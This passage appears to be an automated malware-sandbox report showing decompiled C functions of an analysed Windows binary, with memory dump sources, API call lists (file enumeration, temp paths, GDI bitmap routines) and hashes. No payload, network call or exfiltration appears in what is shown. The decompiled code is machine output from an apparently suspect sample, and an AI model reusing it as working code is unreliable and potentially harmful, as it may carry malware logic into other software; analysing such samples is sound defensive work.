                                                                                                                          				char _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v28;
                                                                                                                          				void* _t34;
                                                                                                                          				intOrPtr _t62;
                                                                                                                          				void* _t71;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t74;
                                                                                                                          				intOrPtr _t77;
                                                                                                                          
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_v8 = __eax;
                                                                                                                          				E004033FC(_v8);
                                                                                                                          				_push(_t77);
                                                                                                                          				_push(0x40758b);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t77;
                                                                                                                          				E004031F4( &_v12, 3, 0x4091dc);
                                                                                                                          				_t49 = E004052AC(_v8, 0, _v12);
                                                                                                                          				_t71 = E0040532C(_t25) - 1;
                                                                                                                          				if(_t71 >= 0) {
                                                                                                                          					_t72 = _t71 + 1;
                                                                                                                          					_t74 = 0;
                                                                                                                          					do {
                                                                                                                          						_t34 = E0040534C(_t49, _t74);
                                                                                                                          						_t81 = _t34;
                                                                                                                          						if(_t34 == 0) {
                                                                                                                          							E00405338(_t49,  &_v28, _t74);
                                                                                                                          							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
                                                                                                                          							E004071D0(_v24, _t49, _t72, _t74); // executed
                                                                                                                          						} else {
                                                                                                                          							E00405338(_t49,  &_v20, _t74);
                                                                                                                          							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
                                                                                                                          							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
                                                                                                                          						}
                                                                                                                          						_t74 = _t74 + 1;
                                                                                                                          						_t72 = _t72 - 1;
                                                                                                                          					} while (_t72 != 0);
                                                                                                                          				}
                                                                                                                          				E00404520(_t49);
                                                                                                                          				_pop(_t62);
                                                                                                                          				 *[fs:eax] = _t62;
                                                                                                                          				_push(E00407592);
                                                                                                                          				return E004030B8( &_v28, 6);
                                                                                                                          			}
















                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				intOrPtr* _t20;
                                                                                                                          				void* _t24;
                                                                                                                          				intOrPtr _t40;
                                                                                                                          				void* _t46;
                                                                                                                          
                                                                                                                          				_push(__ebx);
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v20 = 0;
                                                                                                                          				_push(_t46);
                                                                                                                          				_push(0x406f22);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t46 + 0xfffffff0;
                                                                                                                          				E00405008( &_v16, 1, __ecx);
                                                                                                                          				_push( &_v16);
                                                                                                                          				E004031F4( &_v20, 0xb, 0x40919c);
                                                                                                                          				_pop(_t20);
                                                                                                                          				E00403214(_t20, _v20);
                                                                                                                          				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
                                                                                                                          				if(_t24 != 0) {
                                                                                                                          					E004057D8(__fp0);
                                                                                                                          					asm("fcomp dword [0x406f30]");
                                                                                                                          					asm("fnstsw ax");
                                                                                                                          					asm("sahf");
                                                                                                                          				}
                                                                                                                          				_pop(_t40);
                                                                                                                          				 *[fs:eax] = _t40;
                                                                                                                          				_push(E00406F29);
                                                                                                                          				return E004030B8( &_v20, 2);
                                                                                                                          			}











                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalPathTempTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118298429-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 50%
                                                                                                                          			E00406E0C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				intOrPtr* _t19;
                                                                                                                          				intOrPtr _t37;
                                                                                                                          				void* _t43;
                                                                                                                          				long long _t47;
                                                                                                                          
                                                                                                                          				_t47 = __fp0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v20 = 0;
                                                                                                                          				_push(_t43);
                                                                                                                          				_push(0x406e88);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t43 + 0xfffffff0;
                                                                                                                          				E004057D8(__fp0);
                                                                                                                          				_v12 = _t47;
                                                                                                                          				asm("wait");
                                                                                                                          				E00405008( &_v16, __ebx, __ecx);
                                                                                                                          				_push( &_v16);
                                                                                                                          				E004031F4( &_v20, 0xb, 0x40919c);
                                                                                                                          				_pop(_t19);
                                                                                                                          				E00403214(_t19, _v20);
                                                                                                                          				E00404BF8(E0040340C(_v16), __ebx, 8,  &_v12, __edi, __esi); // executed
                                                                                                                          				_pop(_t37);
                                                                                                                          				 *[fs:eax] = _t37;
                                                                                                                          				_push(E00406E8F);
                                                                                                                          				return E004030B8( &_v20, 2);
                                                                                                                          			}











                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalPathTempTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118298429-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004052AC(void* __eax, void* __ecx, void* __edx) {
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t7;
                                                                                                                          				intOrPtr _t11;
                                                                                                                          				void* _t14;
                                                                                                                          
                                                                                                                          				_t14 = __eax;
                                                                                                                          				_t11 =  *0x40447c; // 0x404488
                                                                                                                          				_t7 = E004044F8(_t11, 0);
                                                                                                                          				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
                                                                                                                          				return _t7;
                                                                                                                          			}








                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1690352074-0
                                                                                                                          • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                                                                          • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                                                                                          • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                                                                          • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00402448(void* __eax) {
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t6;
                                                                                                                          
                                                                                                                          				if(__eax <= 0) {
                                                                                                                          					_t6 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t3 =  *0x409030(); // executed
                                                                                                                          					_t6 = _t3;
                                                                                                                          					if(_t6 == 0) {
                                                                                                                          						E00402530(1);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t6;
                                                                                                                          			}






                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                                                                          • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                                                                                          • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                                                                          • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406510(void* __eax, void* __edx) {
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t4;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t9;
                                                                                                                          				intOrPtr* _t10;
                                                                                                                          
                                                                                                                          				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
                                                                                                                          				return _t3;
                                                                                                                          			}









                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: IconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2096194817-0
                                                                                                                          • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                                                                          • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                                                                                          • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                                                                          • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                                                                          • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                                                                                          • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                                                                          • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                                                                          • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                                                                                          • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                                                                          • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E0040627C(void* __eax, void* __ebp, void* __eflags) {
                                                                                                                          				struct HDC__* _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				struct HDC__* _v44;
                                                                                                                          				struct HDC__* _v60;
                                                                                                                          				struct HDC__* _v68;
                                                                                                                          				struct HDC__* _v72;
                                                                                                                          				void* _t59;
                                                                                                                          				struct HBITMAP__* _t62;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t71;
                                                                                                                          				int _t72;
                                                                                                                          				int _t75;
                                                                                                                          				int _t80;
                                                                                                                          				void* _t81;
                                                                                                                          				void* _t85;
                                                                                                                          				void* _t94;
                                                                                                                          				void* _t100;
                                                                                                                          				void* _t114;
                                                                                                                          				struct HDC__* _t116;
                                                                                                                          				struct HDC__* _t119;
                                                                                                                          				signed int _t121;
                                                                                                                          				struct HBITMAP__* _t124;
                                                                                                                          				struct HBITMAP__* _t125;
                                                                                                                          				RECT* _t126;
                                                                                                                          				void* _t128;
                                                                                                                          
                                                                                                                          				_t128 = __eflags;
                                                                                                                          				_push(__eax);
                                                                                                                          				E00406144(__eax);
                                                                                                                          				_pop(_t59);
                                                                                                                          				if(_t128 != 0) {
                                                                                                                          					asm("pushad");
                                                                                                                          					_t100 = _t59;
                                                                                                                          					 *((intOrPtr*)(_t100 + 0x34))();
                                                                                                                          					 *((intOrPtr*)(_t100 + 0x28)) = 0;
                                                                                                                          					 *((intOrPtr*)(_t100 + 0x56)) = 0;
                                                                                                                          					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
                                                                                                                          					asm("jecxz 0x13");
                                                                                                                          					_t62 =  *(_t100 + 0x3d);
                                                                                                                          					_t121 =  *(_t62 + 4);
                                                                                                                          					_t119 =  *(_t62 + 8);
                                                                                                                          					if(_t119 < 0) {
                                                                                                                          						_t119 =  ~_t119;
                                                                                                                          					}
                                                                                                                          					_push(0);
                                                                                                                          					L00404108();
                                                                                                                          					_push(_t62);
                                                                                                                          					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
                                                                                                                          					if( *((char*)(_t100 + 0x3c)) != 1) {
                                                                                                                          						asm("jecxz 0xfffffff2");
                                                                                                                          						_t124 = 0;
                                                                                                                          						_t110 =  *(_t100 + 0x18);
                                                                                                                          						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
                                                                                                                          						__eflags =  *(_t100 + 0x49) - 5;
                                                                                                                          						if( *(_t100 + 0x49) == 5) {
                                                                                                                          							E0040600C(_t67, _t110);
                                                                                                                          						}
                                                                                                                          						_pop(_t68);
                                                                                                                          						_push(_t68);
                                                                                                                          						_push(E00406268(_t68) *  *(_t100 + 0x18));
                                                                                                                          						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
                                                                                                                          						_push(_t71);
                                                                                                                          						_push(0);
                                                                                                                          						_push(_v12);
                                                                                                                          						_push(_t71);
                                                                                                                          						_t72 =  *(_t100 + 0x18);
                                                                                                                          						__eflags = _t72 - _t119;
                                                                                                                          						if(__eflags > 0) {
                                                                                                                          							_t72 = _t119;
                                                                                                                          						}
                                                                                                                          						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
                                                                                                                          						_t113 =  *(_t100 + 0x18);
                                                                                                                          						__eflags = _t113 - _t119;
                                                                                                                          						if(_t113 > _t119) {
                                                                                                                          							_t113 = _t119;
                                                                                                                          						}
                                                                                                                          						__eflags = _t75 - _t113;
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							_pop(_t81);
                                                                                                                          							E00402468(_t81);
                                                                                                                          							_push(0);
                                                                                                                          							_push(0);
                                                                                                                          							_push(0);
                                                                                                                          							_push(_t126);
                                                                                                                          							_push(0);
                                                                                                                          							_push(_v40);
                                                                                                                          							_push(_v36);
                                                                                                                          							L00404110();
                                                                                                                          							_t121 = _t121 ^ 0xffffffff;
                                                                                                                          							_t124 = 0;
                                                                                                                          							_t85 = SelectObject(_v60, 0);
                                                                                                                          							_t113 = _v68;
                                                                                                                          							__eflags = 0;
                                                                                                                          							E00406094(_t100, 0, _v68, 0, 0);
                                                                                                                          							SelectObject(_v72, _t85);
                                                                                                                          						}
                                                                                                                          						E00406024(_t100, _t100, _t113, __eflags);
                                                                                                                          						_pop( *_t47);
                                                                                                                          						_pop( *_t48);
                                                                                                                          						_pop( *_t49);
                                                                                                                          						 *(_t100 + 0x20) = _t124;
                                                                                                                          						__eflags = _t121;
                                                                                                                          						 *(_t100 + 0x72) = 0;
                                                                                                                          						if(_t121 < 0) {
                                                                                                                          							_t52 = _t100 + 0x72;
                                                                                                                          							 *_t52 =  *(_t100 + 0x72) + 1;
                                                                                                                          							__eflags =  *_t52;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_push(0);
                                                                                                                          						L00404178();
                                                                                                                          						_push(_t62);
                                                                                                                          						_push( *(_t100 + 0x18));
                                                                                                                          						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                                                                                          						_push(_t62);
                                                                                                                          						L00404100();
                                                                                                                          						_t125 = _t62;
                                                                                                                          						L00404190();
                                                                                                                          						_t116 = 0;
                                                                                                                          						_push(_t116);
                                                                                                                          						_push(SelectObject(_t116, _t125));
                                                                                                                          						_push( *(_t100 + 0x18));
                                                                                                                          						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                                                                                          						_push(0);
                                                                                                                          						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
                                                                                                                          						_t117 = _t126;
                                                                                                                          						FillRect(_v44, _t126, _t94);
                                                                                                                          						DeleteObject(_t94);
                                                                                                                          						asm("jecxz 0x24");
                                                                                                                          						SelectObject(_v60, 0);
                                                                                                                          						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
                                                                                                                          						E00406024(_t100, _t100, _t117, _t130);
                                                                                                                          						 *(_t100 + 0x20) = _t125;
                                                                                                                          					}
                                                                                                                          					asm("jecxz 0xa");
                                                                                                                          					_pop(_t114);
                                                                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
                                                                                                                          					_t80 = DeleteDC(_t119);
                                                                                                                          					asm("popad");
                                                                                                                          					return _t80;
                                                                                                                          				}
                                                                                                                          				return _t59;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                                                                                          • 73BBA590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                                                                                          • 73BBAC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                                                                                          • 73BBA520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                                                                                          • 73BBB380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                                                                                          • SelectObject.GDI32(00000000), ref: 00406307
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                                                                                          • FillRect.USER32 ref: 0040632E
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406333
                                                                                                                          • SelectObject.GDI32(?), ref: 00406344
                                                                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00406371
                                                                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                                                                                          • 73BBA7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00406435
                                                                                                                          • DeleteDC.GDI32 ref: 00406465
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2504469172-0
                                                                                                                          • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                                                                          • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                                                                                          • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                                                                          • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                                                                                          • 73BBA590.GDI32(00000000), ref: 0040FD6F
                                                                                                                          • 73BBAC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                                                                                          • 73BBA520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                                                                                          • 73BBB380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                                                                                          • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                                                                                          • FillRect.USER32 ref: 0040FDC6
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040FDCB
                                                                                                                          • SelectObject.GDI32(?), ref: 0040FDDC
                                                                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                                                                                          • SelectObject.GDI32(?), ref: 0040FE09
                                                                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                                                                                          • 73BBA7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2504469172-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
                                                                                                                          				struct HDC__* _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				struct HDC__* _v44;
                                                                                                                          				struct HDC__* _v60;
                                                                                                                          				struct HDC__* _v68;
                                                                                                                          				struct HDC__* _v72;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* _t64;
                                                                                                                          				void* _t66;
                                                                                                                          				struct HBITMAP__* _t69;
                                                                                                                          				void* _t75;
                                                                                                                          				void* _t78;
                                                                                                                          				int _t79;
                                                                                                                          				int _t82;
                                                                                                                          				int _t87;
                                                                                                                          				void* _t88;
                                                                                                                          				void* _t92;
                                                                                                                          				void* _t101;
                                                                                                                          				void* _t108;
                                                                                                                          				void* _t111;
                                                                                                                          				void* _t113;
                                                                                                                          				void* _t115;
                                                                                                                          				void* _t133;
                                                                                                                          				struct HDC__* _t135;
                                                                                                                          				struct HDC__* _t137;
                                                                                                                          				void* _t139;
                                                                                                                          				int* _t140;
                                                                                                                          				struct HDC__* _t142;
                                                                                                                          				signed int _t144;
                                                                                                                          				struct HBITMAP__* _t147;
                                                                                                                          				struct HBITMAP__* _t148;
                                                                                                                          				RECT* _t149;
                                                                                                                          				void* _t151;
                                                                                                                          
                                                                                                                          				_t151 = __eflags;
                                                                                                                          				_t113 = __eax;
                                                                                                                          				_t64 = E00406144(__eax);
                                                                                                                          				if(_t151 == 0) {
                                                                                                                          					L7:
                                                                                                                          					if(__eflags != 0) {
                                                                                                                          						E00406144(_t64);
                                                                                                                          						_t66 = _t64;
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							asm("pushad");
                                                                                                                          							_t115 = _t66;
                                                                                                                          							 *((intOrPtr*)(_t115 + 0x34))();
                                                                                                                          							 *((intOrPtr*)(_t115 + 0x28)) = 0;
                                                                                                                          							 *((intOrPtr*)(_t115 + 0x56)) = 0;
                                                                                                                          							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
                                                                                                                          							asm("jecxz 0x13");
                                                                                                                          							_t69 =  *(_t115 + 0x3d);
                                                                                                                          							_t144 =  *(_t69 + 4);
                                                                                                                          							_t142 =  *(_t69 + 8);
                                                                                                                          							__eflags = _t142;
                                                                                                                          							if(_t142 < 0) {
                                                                                                                          								_t142 =  ~_t142;
                                                                                                                          							}
                                                                                                                          							_push(0);
                                                                                                                          							L00404108();
                                                                                                                          							_push(_t69);
                                                                                                                          							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
                                                                                                                          							if( *((char*)(_t115 + 0x3c)) != 1) {
                                                                                                                          								asm("jecxz 0xfffffff2");
                                                                                                                          								_t147 = 0;
                                                                                                                          								_t129 =  *(_t115 + 0x18);
                                                                                                                          								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
                                                                                                                          								__eflags =  *(_t115 + 0x49) - 5;
                                                                                                                          								if( *(_t115 + 0x49) == 5) {
                                                                                                                          									E0040600C(_t74, _t129);
